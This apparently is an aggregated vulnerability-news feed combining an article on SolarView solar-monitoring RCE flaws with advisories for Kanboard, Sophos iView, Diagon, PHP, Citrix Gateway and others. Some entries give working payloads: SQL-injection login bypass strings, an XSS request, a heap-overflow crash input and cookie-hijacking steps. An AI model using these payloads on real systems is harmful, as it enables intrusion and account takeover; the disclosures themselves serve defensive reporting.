Exposed and unpatched solar power monitoring systems have been exploited by both amateurs and professionals, including Mirai botnet hackers.

Hundreds of solar power monitoring systems are vulnerable to a trio of critical remote code execution (RCE) vulnerabilities. The hackers behind the Mirai botnet and even amateurs have already started taking advantage, and others will follow, experts are predicting.

Palo Alto Networks' Unit 42 researchers previously discovered that the Mirai botnet is spreading through CVE-2022-29303, a command injection flaw in SolarView Series software developed by the manufacturer Contec. According to Contec's website, SolarView has been used in more than 30,000 solar power stations.

On Wednesday, vulnerability intelligence firm VulnCheck pointed out in a blog post that CVE-2022-29303 is one of _three_ critical vulnerabilities in SolarView, and it's more than just the Mirai hackers targeting them.

"The most likely worst-case scenario is losing visibility into the equipment that's being monitored and having something break down," explains Mike Parkin, senior technical engineer at Vulcan Cyber. It's also theoretically possible, though, that "the attacker is able to leverage control of the compromised monitoring system to do greater damage or get deeper into the environment."

**Three Ozone-Sized Holes in SolarView**

CVE-2022-29303 is borne from a particular endpoint in the SolarView Web server, confi\_mail.php, which fails to sufficiently sanitize user input data, enabling the remote malfeasance. In the month it was released, the bug received some attention from security bloggers, researchers, and one YouTuber who showed off the exploit in a still publicly accessible video demonstration. But it was hardly the only problem inside SolarView.

For one thing, there's CVE-2023-23333, an entirely similar command injection vulnerability. This one affects a different endpoint, downloader.php, and was first revealed in February. And there's CVE-2022-44354, published near the end of last year. CVE-2022-44354 is an unrestricted file upload vulnerability affecting yet a third endpoint, enabling attackers to upload PHP Web shells to targeted systems.

VulnCheck noted that these two endpoints, like confi\_mail.php, "appear to generate hits from malicious hosts on GreyNoise meaning that they too are likely under some level of active exploitation."

All three vulnerabilities were assigned "critical" 9.8 (out of 10) CVSS scores.

**How Big of a Cyber Problem Are the SolarView Bugs?**

Only Internet-exposed instances of SolarView are at risk of remote compromise. A quick Shodan search by VulnCheck revealed 615 cases connected to the open Web as of this month.

This, says Parkin, is where the unnecessary headache starts. "Most of these things are designed to be operated _within_ an environment and shouldn't need access from the open Internet under most use cases," he says. Even where remote connectivity is absolutely necessary, there are workarounds that can protect IoT systems from the scary parts of the wider Internet, he adds. "You can put them all on their own virtual local area networks (VLANs) in their own IP address spaces, and restrict access to them to a few specific gateways or applications, etc."

Operators might risk remaining online if, at least, their systems are patched. Remarkably, however, 425 of those Internet-facing SolarView systems — more than two thirds of the total — were running versions of the software lacking the necessary patch.

At least when it comes to critical systems, this may be understandable. "IoT and operational technology devices are often a lot more challenging to update compared to your typical PC or mobile device. It sometimes has management making the choice to accept the risk, rather than take their systems off-line long enough to install security patches," Parkin says.

All three CVEs were patched in SolarView version 8.00.

3 Critical RCE Bugs Threaten Industrial Solar Panels, Endangering Grid Systems

Kanboard is project management software that focuses on the Kanban methodology. In versions prior to 1.2.31authenticated user is able to perform a SQL Injection, leading to a privilege escalation or loss of confidentiality. It appears that in some insert and update operations, the code improperly uses the PicoDB library to update/insert new information. Version 1.2.31 contains a fix for this issue.


1.  Releases
2.  v1.2.31

Security Fixes:

*   CVE-2023-36813: Avoid potential SQL injections without breaking compatibility with plugins

Other fixes and updates:

*   Run tests with PHP 8 on GitHub Actions
*   Bump Symfony dependencies
*   Update Composer dependencies to be able to run tests with PHP 8.2
*   Add /usr/bin/php symlink in the Docker image
*   Replace usage of at() matcher with alternatives in unit tests
*   Adjust plugin directory test case to work on released versions
*   Fix incorrect background dynamic property in captcha library
*   Update translations

CVE-2023-36813: Release Kanboard 1.2.31 · kanboard/kanboard

Cross Site Scripting (XSS) in Sophos Sophos iView (The EOL was December 31st 2020) in grpname parameter that allows arbitrary script to be executed.

Vendor: Sophos

Product: Sophos iView (The EOL was December 31st 2020)

**Product description:**

Reflected XSS in the privileged user area, where i was able to set parameter ‘json->”grpname”’s value to ‘ww;</script>/</script/>/<svg/onload=alert(‘Sophos’) width=100//>’

That successfully embedded a script in the response, which was executed when the page loads in the user’s browser.

*   CVE ID: CVE-2023-33335
*   CWE ID: CWE-79

**#Proof of Concept**

Reflected cross-site scripting (XSS) vulnerability was discovered in the product.

A cross-site scripting vulnerability was identified.

It was possible to inject malicious code, I’ve successfully embedded a script in the response, which allowed me to execute it when the page loaded in the browser.

The following Proof of Concept (PoC) demonstrates the attack as well as displaying evidence of the script payload being returned in the response.

**PoC:**

    POST /iview
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Referer: https://10.0.0.112/webpages/index.jsp?empty=1_1&watermarkmsg=0
    Cookie: JSESSIONID=189B80C28A886E98BBD17B7AEFF1B63C
    Connection: Keep-Alive
    Host: 10.0.0.112
    X-Requested-With: XMLHttpRequest
    Content-Length: 170
    Cache-Control: no-cache
    Accept: text/plain, */*; q=0.01
    Accept-Language: en-US
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    
    mode=28&deviceprofile=123&json={"selecteddevices":"1","grpname":"ww;</script>/</script/>/<svg/onload=alert('Sophos') width=100//>","description":"www"}&__RequestType=ajax
    
    HTTP/1.1 200 200
    Connection: Keep-Alive
    Server: xxxx
    Content-Length: 173
    X-Frame-Options: SAMEORIGIN
    Keep-Alive: timeout=5, max=100
    Cache-Control: max-age=2592000
    Strict-Transport-Security: max-age=31536000; includeSubDomains
    Date: Thu, 09 Jan 2020 14:54:39 GMT
    Expires: Sat, 08 Feb 2020 14:54:39 GMT
    
    {"reurl":"managedevicegroup.html?action=71020","message":"Device Group ww;<\/script>/<\/script/>/<svg/onload=alert('Sophos') width=100//> is already exists.","status":"500"}

Reply from Sophos via Bugcrowd:

“We are divesting the Sophos iView product, meaning that this particular vulnerability is accepted business risk. I will close this issue as Won’t Fix”

**References:**

1.  https://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)
2.  https://www.firewalls.com/pub/media/wysiwyg/datasheets/Sophos/iView.pdf
3.  https://vimeo.com/107872566
4.  https://docs.sophos.com/nsg/sophos-iview/v03012/Help/en-us/webhelp/onlinehelp/index.html#page/onlinehelp/AccessDevice.html

CVE-2023-33335: Reflected Cross-Site scripting in Sophos iView

An access violation vulnerability exists in the GraphPlanar::Write functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

An access violation vulnerability exists in the GraphPlanar::Write functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Diagon v1.0.139

**PRODUCT URLS**

Diagon - https://github.com/ArthurSonzogni/Diagon

**CVSSv3 SCORE**

4.0 - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Diagon is an interpreter that translates markdown into several formats: latex, planar graph, table, tree and many others.

The Diagon interpreter translates from a representation of a graph to a planar graph. For instance, the input could looks like this:

    A--B--C--D--E--F--D--C
    

And the planar graph would result in:

          ┌─┐
          │A│
          └┬┘
          ┌┴┐
          │B│
          └┬┘
    ┌─────┐│
    │  D  ││
    └┬─┬─┬┘│
     │ │┌┴┐│
     │ ││E││
     │ │└┬┘│
     │┌┴─┴┐│
     ││ F ││
     │└───┘│
    ┌┴─────┴─┐
    │   C    │
    └────────┘
    

The input will be parsed and eventually reach the GraphPlanar::Write() function:

    void GraphPlanar::Write() {
      ComputeArrowStyle();
    
      if (id_to_name.size() <= 2) {
        return;
      }
    
      int num_vertices = id_to_name.size();
    
      // Create a graph.
      Graph graph(num_vertices);
      for (auto& it : vertex)
        add_edge(it.from, it.to, graph);
      InitializeEdgeIndex(graph);
    
      // Make it connected.
      boost::make_connected(graph);                                                                         [1]
      InitializeEdgeIndex(graph);
    
      // Make it biconnected.
      Embedding embedding;
      bool is_planar = ComputePlanarEmbedding(graph, embedding);
      if (!is_planar) {
        output_ = "Graph is not planar.\n";
        return;
      }
    
      boost::make_biconnected_planar(graph, embedding.data());                                              [2]
      InitializeEdgeIndex(graph);
      Graph biconnected_graph(graph);
    
      ComputePlanarEmbedding(graph, embedding);
      boost::make_maximal_planar(graph, embedding.data());                                                  [3]
      InitializeEdgeIndex(graph);
    
      // Find a canonical ordering.
      ComputePlanarEmbedding(graph, embedding);
      std::vector<boost::graph_traits<Graph>::vertex_descriptor> ordering;
      boost::planar_canonical_ordering(graph, embedding.data(),
                                       std::back_inserter(ordering));                                       [4]
    
      std::vector<size_t> inverse_ordering(num_vertices);                                                   [5]
      for (int i = 0; i < inverse_ordering.size(); ++i) {
        inverse_ordering[ordering[i]] = i;                                                                  [6]
      }
      [...]
    }
    

This function, until the code at [3], will manipulate the graph representation of the input to satisfy the pre-requisites of the planar_canonical_ordering function at [4]. Indeed, to call the planar_canonical_ordering at [4], the graph must be maximal planar; that is, calculated at [3]. Before calling the make_maximal_planar at [3] the graph must be biconnected. To make the graph biconnected, the function make_biconnected_planar, at [2], is called. The last dependency is that the graph must be connected, which is satisfied using make_connected called at [1].

The Graph type is defined as follows:

    using Graph = boost::adjacency_list<boost::vecS,
                                boost::vecS,
                                boost::undirectedS,
                                boost::property<boost::vertex_index_t, int>,
                                boost::property<boost::edge_index_t, int>>;
    

The first template parameter is used to specify how to store the edges. In this case, the boost::vecS will store the edges in a std::vector. This configuration will allow parallel edges. For instance, in the example bellow, we have the edge (C,D) but also (D,E).

Using the boost::vecS, allegedly, will break some assumption of the called function. For instance, it could create a graph that is not biconnected at [2]. This can lead to an out-of-bounds read and write. In the POC shown below, after calling the planar_canonical_ordering function at [4] the ordering will have a number of elements lower than the num_vertices variable that represent the number of vertices in the graph. Because inverse_ordering, at [5] , is created based on the actual number of vertices, the inverse_ordering buffer and the ordering one will mismatch in sizes. This would cause, at [6], an out-of-bounds read and write.

**Exploit Proof of Concept**

Following the content of the POC used:

    $ cat POC.md
    A--B--C--D--E--F--D--C
    

If we run Diagon compile with ASAN with the POC:

    $ diagon GraphPlanar < POC.md
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==3943598==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000006952ef bp 0x7ffddd10d730 sp 0x7ffddd10c7e0 T0)
    ==3943598==The signal is caused by a READ memory access.
    ==3943598==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
        #0 0x6952ef in GraphPlanar::Write() /home/vagrant/Diagon/src/translator/graph_planar/GraphPlanar.cpp:342:35
        #1 0x693085 in GraphPlanar::Translate(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/vagrant/Diagon/src/translator/graph_planar/GraphPlanar.cpp:194:3
        #2 0x4fbd0e in (anonymous namespace)::Translate(Translator*, int, char const**) /home/vagrant/Diagon/src/main.cpp:277:36
        #3 0x4f97e7 in main /home/vagrant/Diagon/src/main.cpp:326:12
        #4 0x7fe4a9895d09 in __libc_start_main csu/../csu/libc-start.c:308:16
        #5 0x44ca69 in _start (/home/vagrant/Diagon/results/ordering_graphplanar_write_error/diagon_unfixed+0x44ca69)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/vagrant/Diagon/src/translator/graph_planar/GraphPlanar.cpp:342:35 in GraphPlanar::Write()
    ==3943598==ABORTING
    

We can see that a segmentation fault occured. The GraphPlanar.cpp:342 line corresponds to the code at [6]

**VENDOR RESPONSE**

The maintainer has provided a patch at: https://github.com/ArthurSonzogni/Diagon/releases/tag/v1.1.158

**TIMELINE**

2023-05-03 - Vendor Disclosure  
2023-05-08 - Vendor Patch Release  
2023-07-05 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-31194: TALOS-2023-1745 || Cisco Talos Intelligence Group

Beauty Salon Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Beauty Salon Management System v1.0 - SQLi  
# Date of found: 04/07/2023  
# Exploit Author: Fatih Nacar  
# Version: V1.0  
# Tested on: Windows 10  
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>  
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/  
# CWE: CWE-89

Vulnerability Description -

Beauty Salon Management System: V1.0, developed by Campcodes, has been  
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability  
allows an attacker to manipulate login authentication with the SQL queries  
and bypass authentication. The system fails to properly validate  
user-supplied input in the username and password fields during the login  
process, enabling an attacker to inject malicious SQL code. By exploiting  
this vulnerability, an attacker can bypass authentication and gain  
unauthorized access to the system.

Steps to Reproduce -

The following steps outline the exploitation of the SQL Injection  
vulnerability in Beauty Salon Management System V1.0:

1. Open the admin login page by accessing the URL:  
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php

2. In the username and password fields, insert the following SQL Injection  
payload shown inside brackets to bypass authentication for usename  
parameter:

{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In}

3.Execute the SQL Injection payload.

As a result of successful exploitation, the attacker gains unauthorized  
access to the system and is logged in with administrative privileges.

Sqlmap results:

POST parameter 'username' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 793  
HTTP(s) requests:

---

Parameter: username (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)

Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--  
rvYF&password=test&login=Sign In

---

[15:58:56] [INFO] the back-end DBMS is MySQL

web application technology: PHP 8.2.4, Apache 2.4.56

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

Beauty Salon Management System 1.0 SQL Injection

Super Store Finder PHP Script versions 3.6 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.

    #Title : Super Store Finder PHP Script SQL Injection / Bypass admin login#Researcher : Etharus#Vendor : Joe Iz, https://superstorefinder.net/#Script Demo Url : https://superstorefinder.net/products/superstorefinder/#Version Affected : 3.6 and below#Date : 5 July 2023#FOFA Dork : "designed and built by Joe Iz."# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/# Step 2 : Enter following payloadusername : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -password : admin

Super Store Finder PHP Script 3.6 SQL Injection

A vulnerability has been found in SourceCodester Shopping Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file insert-product.php. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232951.

Permalink

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

130 KB

Download

*   Open with Desktop
*   Download
*   Delete file

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2023-3503: CveHubList/Shopping Website (E-Commerce)  insert-product.php has a file upload (RCE) vulnerability.pdf at main · Turbo51/CveHubList

Ubuntu Security Notice 6199-1 - It was discovered that PHP incorrectly handled certain Digest authentication for SOAP. An attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6199-1  
July 03, 2023

php7.4, php8.1 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

PHP could be made to expose sensitive information.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain Digest  
authentication for SOAP. An attacker could possibly use this issue  
to expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libapache2-mod-php7.4           8.1.12-1ubuntu4.2  
  libapache2-mod-php8.0           8.1.12-1ubuntu4.2  
  libapache2-mod-php8.1           8.1.12-1ubuntu4.2  
  php8.1                          8.1.12-1ubuntu4.2  
  php8.1-cgi                      8.1.12-1ubuntu4.2  
  php8.1-cli                      8.1.12-1ubuntu4.2  
  php8.1-soap                     8.1.12-1ubuntu4.2

Ubuntu 22.10:  
  libapache2-mod-php7.4           8.1.7-1ubuntu3.5  
  libapache2-mod-php8.0           8.1.7-1ubuntu3.5  
  libapache2-mod-php8.1           8.1.7-1ubuntu3.5  
  php8.1                          8.1.7-1ubuntu3.5  
  php8.1-cgi                      8.1.7-1ubuntu3.5  
  php8.1-cli                      8.1.7-1ubuntu3.5  
  php8.1-soap                     8.1.7-1ubuntu3.5

Ubuntu 22.04 LTS:  
  libapache2-mod-php7.4           8.1.2-1ubuntu2.13  
  libapache2-mod-php8.0           8.1.2-1ubuntu2.13  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.13  
  php8.1                          8.1.2-1ubuntu2.13  
  php8.1-cgi                      8.1.2-1ubuntu2.13  
  php8.1-cli                      8.1.2-1ubuntu2.13  
  php8.1-soap                     8.1.2-1ubuntu2.13  
  php8.1-sqlite3                  8.1.2-1ubuntu2.13

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.19  
  php7.4                          7.4.3-4ubuntu2.19  
  php7.4-cgi                      7.4.3-4ubuntu2.19  
  php7.4-cli                      7.4.3-4ubuntu2.19  
  php7.4-soap                     7.4.3-4ubuntu2.19

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6199-1  
  CVE-2023-3247

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.12-1ubuntu4.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.5  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.13  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.19

Ubuntu Security Notice USN-6199-1

Citrix Gateway and Cloud MFA suffers from an insufficient session validation vulnerability.

Document Title:  
===============  
Citrix Gateway & Cloud MFA - Insufficient Session Validation Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2324

Vulnerability Magazine:https://www.vulnerability-db.com/?q=articles/2023/07/03/citrix-gateway-cloud-mfa-insufficient-session-validation-vulnerability

Security Video: (Cloud)  
https://www.youtube.com/watch?v=vObgOpGpCSM

Security Video: (OnPrem)  
https://www.youtube.com/watch?v=RFjRgiW2OWE

Release Date:  
=============  
2023-07-03

Vulnerability Laboratory ID (VL-ID):  
====================================  
2324

Common Vulnerability Scoring System:  
====================================  
5

Vulnerability Class:  
====================  
Insufficient Session Validation

Current Estimated Price:  
========================  
2.000€ - 3.000€

Product & Service Introduction:  
===============================  
Cloud Software Group's NetScaler and NetScaler Gateway, previously better known as Citrix ADC and Citrix Gateway (and hereafter referred to as Citrix *)  
provides secure and reliable access to web applications, enterprise applications and corporate data.

"Citrix Gateway consolidates remote access infrastructure to provide single sign-on for all apps, whether in a data center, in a cloud, or  
if the apps are deployed as SaaS apps. It allows users to access any app from any device through a single URL. Citrix Gateway is easy to  
deploy and easy to manage. The most typical deployment configuration is to place the Citrix Gateway appliance in the DMZ. You can install  
multiple Citrix Gateway appliances on the network for more complex deployments."

(Copy of the Homepage:https://docs.citrix.com/de-de/citrix-gateway.html  )

"Many companies restrict website access to valid users only, and control the level of access permitted to each user.  
The authentication, authorization, and auditing feature allows a site administrator to manage access controls with the NetScaler appliance  
instead of managing these controls separately for each application. Doing authentication on the appliance also permits sharing this  
information across all websites within the same domain that are protected by the appliance."

(Copy of the Homepage:https://docs.netscaler.com/en-us/citrix-adc/current-release/aaa-tm.html  &https://citrix.cloud.com  &https://cloud.citrix.com)

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a web vulnerability in the official Citrix Gateway (ADC/NetScaler) 13.0 & 13.1 web-application, Cloud and AAA Feature.

Affected Product(s):  
===================  
Manufacturer:     
Citrix/Cloud Software Group

Products:      
Citrix ADC/NetScaler 13.0 & 13.1  
Citrix Gateway/Netscaler Gateway 13.0 & 13.1  
Citrix Cloud Services Website  
Possibly also earlier versions

Vulnerability Disclosure Timeline:  
==================================  
2023-03-27: Researcher Notification & Coordination (Security Researcher)  
2023-04-24: Vendor Notification (Security Department)  
2023-04-26: Vendor Response/Feedback #1 (Security Department)  
2023-04-27: Vendor Response/Feedback #2 (Security Department)  
2023-05-04: Vendor Response/Feedback #2 (Security Department)  
2023-**-**: Security Acknowledgements (Security Department)  
2023-**-**: Vendor Fix/Patch by Check (Service Developer Team)  
2023-07-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
No User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
An insufficient session validation web vulnerability was discovered in the Citrix Gateway (ADC/NetScaler) 13.0 & 13.1 web-application, Cloud and AAA Feature.  
The security vulnerability allows remote attackers to bypass the mfa function by hijacking the session data of an active user (non expired session) to followup  
with further compromising attacks.

The insufficient session validation vulnerability is located in the Citrix Gateway login without web-application firewall (waf) and the Citrix Gateway login with  
web-application firewall (waf). Attackers can access the applications behind the Citrix Gateway without authentication after compromising a client by extract of a  
specific generated access cookie.In the onprem version of Citrix ADC and Citrix Gateway it is only required to hijack the NSC_AAAC cookie for unauthorized access  
through the Citrix Gateway. To gain access to a AAA protected webservices it is required to hijack the NSC_TMAS cookie.

The security issue is not only exploitable in the onprem version of Citrix ADC and Citrix Gateway, but as well in the Citrix Cloud Services Website.  
For Citrix Cloud Services Website its required to hijack as well the regionSessionId, customer and sessionId to exploit the vulnerability.  
Any kind of authentication (Single and Multifactor) does not prevent the exploitation of this vulnerability.

Citrix does recomment that customers should use the web-application firewall to protect the session data but finally the protection  
mechanism does not secure against thus type of insufficient session validation attacks.

Successful exploitation of the vulnerability leads to session hijacking, unauthorized access to applications content and  
compromise of the accessable infrastructure behind, through the Citrix Gateway and AAA.

Vulnerable Function(s):  
[+] NSC_AAAC (Cookie)  
[+] NSC_TMAS (Cookie)

Affected Module(s):  
[+] Citrix Gateway  
[+] AAAC

Proof of Concept (PoC):  
=======================  
The insufficent session validation web vulnerability can be exploited by remote attackers without user interaction with remote device access (exp. client compromise).  
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability  
1.  Open the url for the Citrix Gateway  
2.  Open the browser internal web developer tools  
3.  Login to the Citrix Gateway and enter the login data  
4.  Successful login and it can be observed that an additional cookie is written (NSC_AAAC)  
5.  On a second unknown test computer system the citrix gateway is opened (browser)  
6.  Open the browser internal web developer tools  
7.  Creation of a new cookie for the page with the name, value and path of the cookie of the other session  
8.  Reload of the login page or login to the login screen with random values (Input of content is important to use the logon)  
9.  Successful login by the second device and take over the active non expired session  
10. Successful reproduce of the vulnerability!

Note: To reproduce the same issue on the Citrix Cloud Services Website you have to add 3 cookies  
- sessionId  
- regionSessionId  
- customer

The video victim shows: Victim  
- Victim accesseshttps://eu.cloud.com  and is redirected tohttps://accounts.cloud.com  for authentication  
- After successful authentication with MFA, he is redirected tohttps://citrix.cloud.com  
- Victim now sees the customers/tenants he has access to. He chooses <censored> EU Demo Cloud 2. The tenant ID (and content of the cookie "customer") is displayed. He is redirected tohttps://eu.cloud.com  
- The victim now sees the services provided for the tenant  
- The cookies necessary for the attacker are visible (sessionID, regionSessionID, customer)  
- The video ends

The video attacker shows: Attacker  
- The attacker callshttps://eu.cloud.com  and is redirected tohttps://accounts.cloud.com  for authentication. So he is not yet authenticated and does not have access to the EU Cloud yet  
- The attacker creates the cookies with the pilfered values for the respective domain. (Name: sessionID, Value: JtLzXIU9OeKy_2TkwYyssg, Path: /, Domain: eu.cloud.com), (Name: customer, Value: f0t66hjbpi0o, Path: /, Domain: .cloud.com) The regionSessionID was not used because they are the same for the victim and attacker forhttps://eu.cloud.com). If the initial call was in a different region than the Customer, the value would need to be changed  
- The attacker callshttps://eu.cloud.com  again and is now in the victim's tenant (CCID/customer cookie: f0t66hjbpi0o). The attacker now sees the services provided to the tenant  
- Through the menu, the attacker sees that he would have access to all kind of Citrix Cloud Infrastructure Services (for example Citrix DaaS, Citrix Gateway Service, Citrix Workspace Configuration, Citrix Identity & Access Management, Citrix Endpoint Management, Citrix ShareFile), licensing, support tickets and co  
- The video ends

Security Risk:  
==============  
The security risk of the citrix gateway and cloud services vulnerability in the mfa portal authentication module is estimated as medium.

Credits & Authors:  
==================  
Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther  
Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
EVOLUTION SECURITY GMBH  
FRIEDRICH-EBERT-STRAßE 10  
34117 KASSEL - HESSEN  
DEUTSCHLAND (DE)

Citrix Gateway And Cloud MFA Insufficient Session Validation

A vulnerability, which was classified as critical, was found in SourceCodester Shopping Website 1.0. Affected is an unknown function of the file search-result.php. The manipulation of the argument product leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-232950 is the identifier assigned to this vulnerability.

Tag

#php